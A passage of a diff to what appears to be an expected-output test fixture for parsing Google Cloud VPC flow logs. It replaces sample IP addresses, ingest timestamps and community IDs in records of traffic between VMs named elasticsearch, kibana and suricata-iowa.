@@ -7950,8 +7950,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868706500Z", - "original": "{\"insertId\":\"bnj3cofh3cdk5\",\"jsonPayload\":{\"bytes_sent\":\"171610\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"71\",\"reporter\":\"SRC\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391592600Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk5\",\"jsonPayload\":{\"bytes_sent\":\"171610\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"71\",\"reporter\":\"SRC\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469473010Z", "end": "2019-06-14T03:49:51.821129119Z", @@ -7972,10 +7972,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33858, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -7989,7 +7989,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:DXSnxcLrDyftjOc5jFhwTKkshsM=", + "community_id": "1:FZaxwdeLVaVT2X3mtyj9cQcUk8w=", "bytes": 15186, "name": "default", "transport": "tcp", @@ -8012,7 +8012,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -8048,8 +8048,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868709900Z", - "original": "{\"insertId\":\"bnj3cofh3cdk6\",\"jsonPayload\":{\"bytes_sent\":\"15186\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933164456Z\",\"packets_sent\":\"75\",\"reporter\":\"SRC\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391596300Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk6\",\"jsonPayload\":{\"bytes_sent\":\"15186\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933164456Z\",\"packets_sent\":\"75\",\"reporter\":\"SRC\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458515996Z", "end": "2019-06-14T03:49:37.933164456Z", @@ -8070,10 +8070,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33590, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -8087,7 +8087,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:LSB085+2dyGfQIXV+wF0qEVVBbM=", + "community_id": "1:hba8zo6o+Om2iBhvTc1A5aHscIQ=", "bytes": 208416, "name": "default", "transport": "tcp", @@ -8110,7 +8110,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -8146,8 +8146,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868713600Z", - "original": "{\"insertId\":\"y4wffpfk2ero3\",\"jsonPayload\":{\"bytes_sent\":\"208416\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391600200Z", + "original": 
"{\"insertId\":\"y4wffpfk2ero3\",\"jsonPayload\":{\"bytes_sent\":\"208416\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147151100Z", "end": "2019-06-14T03:49:59.565116665Z", @@ -8168,10 +8168,10 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60108, "domain": "suricata-iowa", - "ip": "192.0.2.177" + "ip": "192.168.2.177" }, "source": { "address": "10.139.99.242", @@ -8185,7 +8185,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:kjDd+NEFkosMxZFp790k2Cervw4=", + "community_id": "1:snu0k+vlENq/m4IvQF8L2f6rQrY=", "bytes": 90977, "name": "default", "transport": "tcp", @@ -8208,7 +8208,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.177" + "192.168.2.177" ] }, "gcp": { 
@@ -8244,8 +8244,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868717400Z", - "original": "{\"insertId\":\"y4wffpfk2eroh\",\"jsonPayload\":{\"bytes_sent\":\"90977\",\"connection\":{\"dest_ip\":\"192.0.2.177\",\"dest_port\":60108,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"357\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391603600Z", + "original": 
"{\"insertId\":\"y4wffpfk2eroh\",\"jsonPayload\":{\"bytes_sent\":\"90977\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60108,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"357\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.762958327Z", "end": "2019-06-14T03:49:54.108975753Z", @@ -8266,10 +8266,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33536, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -8283,7 +8283,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:c/u5Mg/PGR6riBWo0YXGpZWs3cI=", + "community_id": "1:LeOPi08ubqTh6aNT93e8m/GSF+Y=", "bytes": 187301, "name": "default", "transport": "tcp", @@ -8306,7 +8306,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -8342,8 +8342,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868721300Z", - "original": "{\"insertId\":\"y4wffpfk2erom\",\"jsonPayload\":{\"bytes_sent\":\"187301\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"242\",\"reporter\":\"SRC\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391608Z", + "original": 
"{\"insertId\":\"y4wffpfk2erom\",\"jsonPayload\":{\"bytes_sent\":\"187301\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"242\",\"reporter\":\"SRC\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150481417Z", "end": "2019-06-14T03:49:59.565156020Z", @@ -8370,18 +8370,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 139106, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 244 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:daatd5jK/QqBAjEYb64ySmXIcOU=", + "community_id": "1:VbVjklGBQiIYWy94d7CXlQ+ISxo=", "bytes": 139106, "name": "default", "transport": "tcp", @@ -8403,7 +8403,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -8440,8 +8440,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868725100Z", - "original": "{\"insertId\":\"y4wffpfk2ero9\",\"jsonPayload\":{\"bytes_sent\":\"139106\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391613600Z", + "original": 
"{\"insertId\":\"y4wffpfk2ero9\",\"jsonPayload\":{\"bytes_sent\":\"139106\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075859688Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -8468,18 +8468,18 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60108, "bytes": 1733360, "domain": "suricata-iowa", - "ip": "192.0.2.177", + "ip": "192.168.2.177", "packets": 708 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:kjDd+NEFkosMxZFp790k2Cervw4=", + "community_id": "1:snu0k+vlENq/m4IvQF8L2f6rQrY=", "bytes": 1733360, "name": "default", "transport": "tcp", @@ -8501,7 +8501,7 @@ }, "related": { "ip": [ - "192.0.2.177", + "192.168.2.177", "10.139.99.242" ] }, 
@@ -8538,8 +8538,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868728300Z", - "original": "{\"insertId\":\"y4wffpfk2erog\",\"jsonPayload\":{\"bytes_sent\":\"1733360\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.177\",\"src_port\":60108},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"708\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391619400Z", + "original": 
"{\"insertId\":\"y4wffpfk2erog\",\"jsonPayload\":{\"bytes_sent\":\"1733360\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60108},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"708\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.762958327Z", "end": "2019-06-14T03:49:54.108975753Z", @@ -8560,10 +8560,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33874, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -8577,7 +8577,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5AIfpIZXAUHToCeVBhXgBuugIac=", + "community_id": "1:kUsQhMSOvL5RMyh4vWwz55fq9ss=", "bytes": 149157, "name": "default", "transport": "tcp", @@ -8600,7 +8600,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -8636,8 +8636,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868731300Z", - "original": "{\"insertId\":\"y4wffpfk2ero7\",\"jsonPayload\":{\"bytes_sent\":\"149157\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"74\",\"reporter\":\"SRC\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391624900Z", + "original": 
"{\"insertId\":\"y4wffpfk2ero7\",\"jsonPayload\":{\"bytes_sent\":\"149157\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"74\",\"reporter\":\"SRC\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flo